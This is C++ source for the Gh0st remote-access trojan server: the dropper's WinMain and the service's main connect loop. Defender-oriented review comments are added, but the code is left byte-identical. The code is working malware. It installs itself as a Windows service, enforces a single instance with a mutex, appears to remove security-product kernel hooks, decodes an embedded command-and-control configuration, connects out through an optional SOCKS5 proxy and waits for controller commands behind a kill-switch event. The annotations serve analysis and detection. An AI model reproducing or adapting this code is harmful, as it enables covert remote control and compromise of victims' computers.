// Dropper / installer entry point for the EXE build of this Gh0st RAT server
// (the "Gh0st" name is taken from the command-line and event-name literals in
// this file). It (1) refuses to run twice on the same host via a named mutex,
// (2) writes its own path to <system32>\install.tmp — presumably so the
// installed service can later locate and delete the dropper (main() calls a
// DeleteInstallFile helper), and (3) installs and starts a Windows service via
// project helpers whose bodies are not visible here. Always returns -1.
// Comments marked NOTE(review) are defender-oriented observations; the code
// itself is left byte-identical.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // TODO: Place code here.
    //////////////////////////////////////////////////////////////////////////
    // NOTE(review): CopyFile with a NULL destination cannot succeed, and the
    // debug string goes nowhere useful; these two calls appear to exist only to
    // embed the taunt string in the binary ("KV" presumably refers to an AV
    // product) — treat that reading as an assumption. The literal is a usable
    // static signature for this build.
    OutputDebugString("%%%%%F**k KV %%%%%F**k KV %%%%%");
    CopyFile("%%%%%F**k KV %%%%%F**k KV %%%%%", NULL, false);
    //////////////////////////////////////////////////////////////////////////
    // 100-byte placeholder. Presumably patched with the (encoded) C2
    // configuration when the binary is generated — main() locates a similar
    // blob by an "AAAAAA" marker — confirm against the builder. Whatever it
    // holds is also used verbatim as the single-instance mutex name below, so
    // that mutex name is a per-build host indicator.
    char *lpEncodeString = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    // If this is not a server-side update run (the command line does not
    // contain "Gh0st Update"), enforce single installation per configuration.
    if (strstr(GetCommandLine(), "Gh0st Update") == NULL)
    {
        // Created with bInitialOwner = true; the result is judged purely from
        // GetLastError(), the returned handle is never checked for NULL.
        HANDLE hMutex = CreateMutex(NULL, true, lpEncodeString);
        DWORD dwLastError = GetLastError();
        // Original comments (translated): a normal-privilege process opening a
        // mutex created at SYSTEM privilege gets ERROR_ACCESS_DENIED if it
        // already exists; either error means an identically configured
        // instance is already installed, so do not install again.
        if (dwLastError == ERROR_ALREADY_EXISTS || dwLastError == ERROR_ACCESS_DENIED)
            return -1;
        ReleaseMutex(hMutex);
        CloseHandle(hMutex);
    }
    // bad_exception is a project-defined unhandled-exception filter (not
    // visible here).
    SetUnhandledExceptionFilter(bad_exception);
    // Project helper. The name suggests it restores System Service Descriptor
    // Table entries (i.e. removes kernel hooks placed by security products);
    // its body is not in this view — treat as an assumption.
    ResetSSDT(hInstance);
    // Full path of this executable.
    char strSelf[MAX_PATH];
    memset(strSelf, 0, sizeof(strSelf));
    GetModuleFileName(NULL, strSelf, sizeof(strSelf));
    // %TEMP% and the system directory (despite the "SysLog" name this is just
    // the system32 path). NOTE(review): neither call's result is checked and
    // lstrcat appends without a length check against MAX_PATH.
    char strTempPath[MAX_PATH], strSysLog[MAX_PATH];
    GetTempPath(sizeof(strTempPath), strTempPath);
    GetSystemDirectory(strSysLog, sizeof(strSysLog));
    lstrcat(strTempPath, "\\install.tmp");
    lstrcat(strSysLog, "\\install.tmp");
    // Artifact: %TEMP%\install.tmp is created (CREATE_ALWAYS, so any existing
    // file is truncated) and filled with this EXE's full path, without a
    // trailing NUL. NOTE(review): hFile is not checked against
    // INVALID_HANDLE_VALUE before WriteFile/CloseHandle.
    HANDLE hFile = CreateFile(strTempPath, GENERIC_ALL, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    DWORD dwBytesWrite = 0;
    WriteFile(hFile, strSelf, lstrlen(strSelf), &dwBytesWrite, NULL);
    CloseHandle(hFile);
    // Artifact: the file is moved to <system32>\install.tmp, so that file
    // records the path the dropper was executed from. If the move succeeded
    // the following DeleteFile of the temp path has nothing to delete.
    MoveFile(strTempPath, strSysLog);
    DeleteFile(strTempPath);
    // Project helper: installs the service and returns its name as a
    // new[]-allocated string, or NULL on failure. The service name chosen is
    // not visible in this view.
    char *lpServiceName = InstallService();
    if (lpServiceName != NULL)
    {
        // Single-argument call, so this is presumably a project wrapper and
        // not the Win32 StartService (which takes an SC_HANDLE).
        StartService(lpServiceName);
        delete [] lpServiceName;
    }
    // Always -1, whether or not installation succeeded.
    return -1;
}
// Main loop of the Gh0st RAT server (service build). The "#endif" directly
// after the signature closes an "#ifdef _CONSOLE / #else" block that begins
// above this view: in the _CONSOLE build the function presumably takes
// argc/argv (both are used below), in the service build it receives the
// service name. Flow: locate the embedded config, switch to the interactive
// window station, reconfigure the service and delete the dropper, then loop
// forever: resolve C2 settings, connect (optionally through SOCKS5), send
// login info, wait for the controller's activate command, and stay connected
// until the socket drops or the kill-switch event appears.
// NOTE(review): declared to return DWORD but has no return statement at the
// end of the function, so the value handed back to the caller is undefined.
// Comments marked NOTE(review) are defender-oriented observations.
DWORD WINAPI main(char *lpServiceName)
#endif
{
#ifdef _CONSOLE
    // Console build: host and port come from the command line.
    if (argc < 3)
    {
        printf("Usage:\n %s <Host> <Port>\n", argv[0]);
        return -1;
    }
#endif
    // Local copy of lpServiceName, which (original comment) is gone once
    // ServiceMain returns. NOTE(review): lstrcpy below copies without a bound
    // against the 256-byte buffer.
    char strServiceName[256];
    // Kill-switch event name, built below.
    char strKillEvent[50];
    HANDLE hInstallMutex = NULL;
#ifdef _DLL
    // Locates the embedded configuration blob by its 6-byte "AAAAAA" marker in
    // this module; lpURL points at the marker itself. The name and the
    // MyDecode(lpURL + 6) call below suggest an encoded C2 address string —
    // confirm against getLoginInfo/MyDecode.
    char *lpURL = (char *)FindConfigString(CKeyboardManager::g_hInstance, "AAAAAA");
    if (lpURL == NULL)
    {
        return -1;
    }
    //////////////////////////////////////////////////////////////////////////
    // Set Window Station
    // A service runs in a non-interactive window station; switching to
    // winsta0 gives the process access to the interactive desktop (presumably
    // needed by the desktop-facing features). hOldStation is kept but, per the
    // comment at the end, never restored.
    HWINSTA hOldStation = GetProcessWindowStation();
    HWINSTA hWinSta = OpenWindowStation("winsta0", FALSE, MAXIMUM_ALLOWED);
    if (hWinSta != NULL)
        SetProcessWindowStation(hWinSta);
    //
    //////////////////////////////////////////////////////////////////////////
    if (CKeyboardManager::g_hInstance != NULL)
    {
        SetUnhandledExceptionFilter(bad_exception);
        // Project helper; name suggests SSDT hook removal — body not visible.
        ResetSSDT();
        lstrcpy(strServiceName, lpServiceName);
        // Kill-switch name "Global\Gh0st <tick count>". The original comment
        // calls it a random event name, but GetTickCount() is milliseconds
        // since boot, so it is merely hard to guess, not random. The fixed
        // prefix "Global\Gh0st " is a detectable indicator. The name is handed
        // to CKernelManager below, presumably so the controller can trigger
        // termination by creating the event.
        wsprintf(strKillEvent, "Global\\Gh0st %d", GetTickCount()); // random event name (original comment)
        // Single-instance mutex named with the raw, still-encoded config
        // string (the dropper in WinMain uses the same scheme) — confirm.
        hInstallMutex = CreateMutex(NULL, true, lpURL);
        // Project helpers: ReConfigService adjusts the installed service;
        // DeleteInstallFile presumably consumes <system32>\install.tmp written
        // by the dropper to find and remove it.
        ReConfigService(strServiceName);
        // Delete the installation file
        DeleteInstallFile(lpServiceName);
    }
    // http://hi.baidu.com/zxhouse/blog/item/dc651c90fc7a398fa977a484.html
#endif
    // Tell the OS not to pop up an alarming dialog when a CD/floppy disc is
    // missing (original comment): critical-error dialogs are suppressed.
    SetErrorMode( SEM_FAILCRITICALERRORS);
    char *lpszHost = NULL;
    DWORD dwPort = 80;
    char *lpszProxyHost = NULL;
    DWORD dwProxyPort = 0;
    char *lpszProxyUser = NULL;
    char *lpszProxyPass = NULL;
    HANDLE hEvent = NULL;
    CClientSocket socketClient;
    // Reason for the last disconnect; initialised to "not yet connected".
    BYTE bBreakError = NOT_CONNECT;
    // Reconnect loop; only the kill-switch event breaks out of it.
    while (1)
    {
        // Back off only if the previous attempt ended for a reason other than
        // "never connected" or a heartbeat timeout (original comment: no need
        // to sleep two minutes again after a heartbeat timeout).
        if (bBreakError != NOT_CONNECT && bBreakError != HEARTBEATTIMEOUT_ERROR)
        {
            // ~2 minutes (2000 x 60 ms) before reconnecting, polled in small
            // steps so the kill event is noticed quickly (original comment).
            // NOTE(review): the break below leaves only this for-loop; the
            // outer while(1) then still proceeds to another connect attempt,
            // and the kill event is honoured only by the do/while further
            // down. The second break is unreachable.
            for (int i = 0; i < 2000; i++)
            {
                hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent);
                if (hEvent != NULL)
                {
                    socketClient.Disconnect();
                    CloseHandle(hEvent);
                    break;
                    break;
                }
                // (original note: "tweak this")
                Sleep(60);
            }
        }
#ifdef _DLL
        // Check-in interval is 2 minutes; the first six 'A's are the marker
        // (original comment). The blob after the marker is decoded into
        // host/port and optional proxy settings on every iteration.
        if (!getLoginInfo(MyDecode(lpURL + 6), &lpszHost, &dwPort, &lpszProxyHost, &dwProxyPort, &lpszProxyUser, &lpszProxyPass))
        {
            bBreakError = GETLOGINFO_ERROR;
            continue;
        }
#else
        lpszHost = argv[1];
        dwPort = atoi(argv[2]);
#endif
        // SOCKS5 proxy if one is configured, otherwise a direct connection.
        if (lpszProxyHost != NULL)
            socketClient.setGlobalProxyOption(PROXY_SOCKS_VER5, lpszProxyHost, dwProxyPort, lpszProxyUser, lpszProxyPass);
        else
            socketClient.setGlobalProxyOption();
        DWORD dwTickCount = GetTickCount();
        if (!socketClient.Connect(lpszHost, dwPort))
        {
            bBreakError = CONNECT_ERROR;
            continue;
        }
        // Log in. dwExitCode is assigned but never read.
        DWORD dwExitCode = SOCKET_ERROR;
        // Login packet carries the service name and the connect latency in ms.
        sendLoginInfo(strServiceName, &socketClient, GetTickCount() - dwTickCount);
        // Command dispatcher; receives the kill-switch name and C2 endpoint.
        CKernelManager manager(&socketClient, strServiceName, g_dwServiceType, strKillEvent, lpszHost, dwPort);
        socketClient.setManagerCallBack(&manager);
        //////////////////////////////////////////////////////////////////////////
        // Wait for the controller to send the activate command, 10 s timeout
        // (10 x 1 s), then reconnect in case of a bad connection (original
        // comment).
        for (int i = 0; (i < 10 && !manager.IsActived()); i++)
        {
            Sleep(1000);
        }
        // No activate command within 10 s means the peer is not the controller
        // (original comment) — reconnect. NOTE(review): in effect this also
        // makes a passive sinkhole or scanner unable to hold the session.
        if (!manager.IsActived())
            continue;
        //////////////////////////////////////////////////////////////////////////
        DWORD dwIOCPEvent;
        // Reassigned here but not read afterwards.
        dwTickCount = GetTickCount();
        // Poll roughly every 600 ms until the kill event exists or the
        // socket's event is signalled (connection lost).
        do
        {
            hEvent = OpenEvent(EVENT_ALL_ACCESS, false, strKillEvent);
            dwIOCPEvent = WaitForSingleObject(socketClient.m_hEvent, 100);
            Sleep(500);
        } while(hEvent == NULL && dwIOCPEvent != WAIT_OBJECT_0);
        // Kill switch: disconnect and leave the reconnect loop for good.
        if (hEvent != NULL)
        {
            socketClient.Disconnect();
            CloseHandle(hEvent);
            break;
        }
    }
#ifdef _DLL
    //////////////////////////////////////////////////////////////////////////
    // Restore WindowStation and Desktop
    // Not restored on purpose (original comment): during a server update the
    // new server runs first, and if this process restored the desktop the
    // screen would go black.
    // SetProcessWindowStation(hOldStation);
    // CloseWindowStation(hWinSta);
    //
    //////////////////////////////////////////////////////////////////////////
#endif
    // In the _CONSOLE build hInstallMutex is still NULL here, so the two
    // mutex calls simply fail.
    SetErrorMode(0);
    ReleaseMutex(hInstallMutex);
    CloseHandle(hInstallMutex);
}